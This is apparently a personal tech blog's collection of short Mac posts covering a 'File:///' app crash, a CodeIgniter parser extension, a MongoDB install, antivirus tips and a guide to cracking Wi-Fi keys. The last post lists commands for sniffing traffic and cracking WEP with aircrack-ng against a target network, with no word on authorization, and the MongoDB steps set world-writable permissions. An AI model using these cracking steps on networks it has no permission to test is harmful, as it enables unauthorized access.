Crashing a Mac Easily

crashing-a-mac

So… you thought that OSX was the most stable OS ever developed… right?. Guess what… you can crash it super easily. Just try the following…

  • Open any OSX app. For instance, Safari.
  • Type in the location bar the following string:  File:///
  • See the crash onscreen?

It’s been reported in OpenRadar, and astonishingly, it’s only affecting the latest incarnation of OSX, Mountain Lion. You can crash Chrome, Safari… and probably, any app you’ve got installed.

What’s all the fuzz about?. Crashes can be used to get ownership of the IP pointer.. which is, in layman terms, the guy that says what-to-execute next. Long short story, this could potentially be used to develop an exploit, to scale permissions in the system.

Let’s wait for a patch… 10.8.3 is taking quite a long time to ship.

Extending CodeIgniter Parser to support Objects

CodeIgniterI really like codeIgniter, since it’s super lightweight, and its learning curve is super small. You can get to build a whole website within just a couple days, even with database support.

I’ve written myself a e-commerce website in just two weeks, without having previous knowledge on the technology. Now, let’s get to business.

What happens when you’re writing a view (php based), and you need to display a variable?. Well, you’ve got, essentially, two options. To begin with, you can simply invoke the php ‘echo’ routine, by doing something like this:

[cc lang=”php”][/cc]

Now, if you wanna keep your code really clean, you can rely on CodeIgniter built in parser. How do you implement it?… super simple…:


1. Initialize the Parser Library:

[cc lang=”php”]$this->load->library(‘parser’);[/cc]

2. Replace the ‘<?php echo $blog_title; ?>’ routines with the following syntax:

[cc lang=”php”]{blog_title}[/cc]

So far so good. Now… here’s something interesting. What happens if you wanna print an object’s property? or an object’s method?. Well, CodeIgniter doesn’t support that scenario. It will only work with strings, and with arrays (of strings). So… i’ve extended a bit the library, in order to support ‘printing object’s properties’.

You can download right here my extended version of the parser. We won’t be analyzing the code i’ve written. It’s not complex, and you’re invited to run a diff between the original, and my patch.

Now… how do we use it?. Simple…

1. Install the sf_parser library

You should copy the ‘sf_parser.php’ file to ‘/application/libraries/sf_parser.php’. That’s it. No more no less. Simplicity is one of the things i love the most about CI framework.

2. Initialize the sf_parser library

Instead of initializing the CI’s default parser, we’re gonna need to load our custom library. We can achieve that by doing the following:

[cc lang=”php”]$this->load->library(‘sf_parser’);[/cc]

3. Use the new syntax!

The goal of this library is to enable you (the user!) to print any object’s properties, or getter’s results. Which means that… instead of using the following syntax, in your view.php file:

[cc lang=”php”]get_title();>[/cc]

You can now do something far more elegant… which looks something like this:

[cc lang=”php”]{blog:get_title}[/cc]

If you found it useful… if you found a bug… or if you’ve extended it further, i’d love to hear from you!

Install mongoDB on a Mac!

mongoDB on a Mac

MongoDB is a NoSQL database, free of charge. The beauty of mongo relies on its schema-less design… you can add and remove fields, without doing ‘alter table’.

Your information gets stored in JSON, which is  seriously interesting, specially if you work with iOS / Android Apps, and the communications layer works in json.

So.. fire up a browser, and head to this urls. Assuming you’re running OSX (like me!), you’d need the mac binary, which is about 60 megabytes.

Preferrably, you’ll need to download the 64 bits executable. The 32 bits version can address only databases up to 2 gigabytes.

Once you’ve got the file, simply double click on it, to get it uncompressed. Assuming that the file is in the downloads folder, let’s move it to a more suitable location.

Launch terminal, and type the following:

[cc lang=”bash”]
sudo
cd ~/Downloads/
sudo mv mongodb /usr/local/mongodb
[/cc]

Mongo stores its databases in the “/data/db” directory, so… we’d need to create them:

[cc lang=”bash”]
mkdir /data
mkdir /data/db
chmod 777 /data/db
[/cc]

Now, let’s add a couple symbolic links, so you can launch mongo from anywhere in the system:

[cc lang=”bash”]
cd /usr/local/bin
ln /usr/local/mongodb/bin/mongod
[/cc]

That’s it! you’ve just installed mongo!. In order to launch the database, you simply need to type the ‘mongodb’ command.

If you wanna launch a command-line client, type ‘mongo’, which should connect to the server, right away.

Do Macs need Antivirus?. Yeah, they do!

MacbookProSo… you own an iMac.. maybe a Macbook Pro, or maybe you’re one of the lucky owners of a Mac Pro. You’ve been watching ads for the last ten years… you bought it all, and you feel safe just because it’s not a windows… right?.

Well… things are not the way they were a couple years ago. As Apple gained more and more marketshare, virus developers turned their eyes on our belived OSX system. Since Java virtual machine has been found to be buggy… several viruses that affected Mac have been caught in the wild.

What can we do?. Well.. there are a couple things you could do….

1. Enable Mac Gatekeeper

What is the Mac Gatekeeper?. Well, the concept is simple. We just close the door to malicious software, by only installing software from trusted sources. Ever wondered why there are no viruses for iPhone?. Well… it’s because iOS ecosystem is a walled garden. By enabling the Gatekeeper, you’d be replicating the same safe environment as iOS has.

In order to enable the GateKeeper, you need to go to “System Preferences >> Security & Privacy” (in Mountain Lion). You will get this screen:

Screen Shot 2013-01-23 at 11.36.08 PM

See where it says ‘Allow applications downloaded from’?. Make sure you check ‘Mac App Store’ (or Mac App Store + identified devs). ‘Anywhere’ is not recommended.

That way you’re computer will install software ONLY from trusted sources.

2. Install Mac Antivirus Software

Yes… installing an antivirus will impact, slightly, on your performance. But at the very least, you’ll get to feel safe again. It’s just a feeling, bear that in mind, always!.

What antivirus software can you use?. Well, you could try AVG for Mac (which is free!), ESET for Mac (paid, but one of the best), and Norton Antivirus for Mac.

3. Install a Firewall

One of the things that make me freak out the most… is not knowing what applications are openning connections with remote servers. So… if you’re paranoid like me, you could simply install a firewall, and validate, process by process, if they really need to access internet.

Hopefully, with this extra software you’ll be able to stay away from trouble. Again… hopefully!.

Running airmon-ng in mountain lion!

aircrack-ngFor those of you who have no clue what is all of this about, Aircrack-ng is a command line tool that allows you to bruteforce WEP and WPA wi-fi password protections.

WEP being the easiest protection to break, and WPA the hardest. The difference?. WEP can be broken in… two days, give or take (probably less than that), while WPA could take months… without results!. Personally, everytime i needed to break a WEP protection, i had to boot a linux system. If you’re like me, and you’d rather staying in OSX, this is juuuuust for you.

I don’t wanna forget about this, so i’m writing this short guide, right here!

  1. Install Macports.
  2. Install aircrack-ng:[cc lang=”bash”]sudo port install aircrack-ng[/cc]
  3. Install the latest Xcode, with the Command Line Tools.
  4. Create the following symlink:[cc lang=”bash”]sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport[/cc]
  5. Figure out which channel you need to sniff:[cc lang=”bash”]sudo airport -s[/cc]
  6. Open up a terminal and type:[cc lang=”bash”]sudo airport en1 sniff [CHANNEL][/cc]
  7. Open up a seecond terminal and type:[cc lang=”bash”]aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]

Notes: the cap_file will be located in the /tmp/airportSniff*.cap.
Nice, right?

===========================
Update:

I’ve been having issues while trying to crack a WEP key. I had over 100k IV’s… without luck. So i’ve attepted to crack the key with the KoreK algorithm (coded in aircrack-ng). And guess what!! i got the key!!. If you ever have the same problem, try this:

[cc lang=”bash”]aircrack-ng -K -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE][/cc]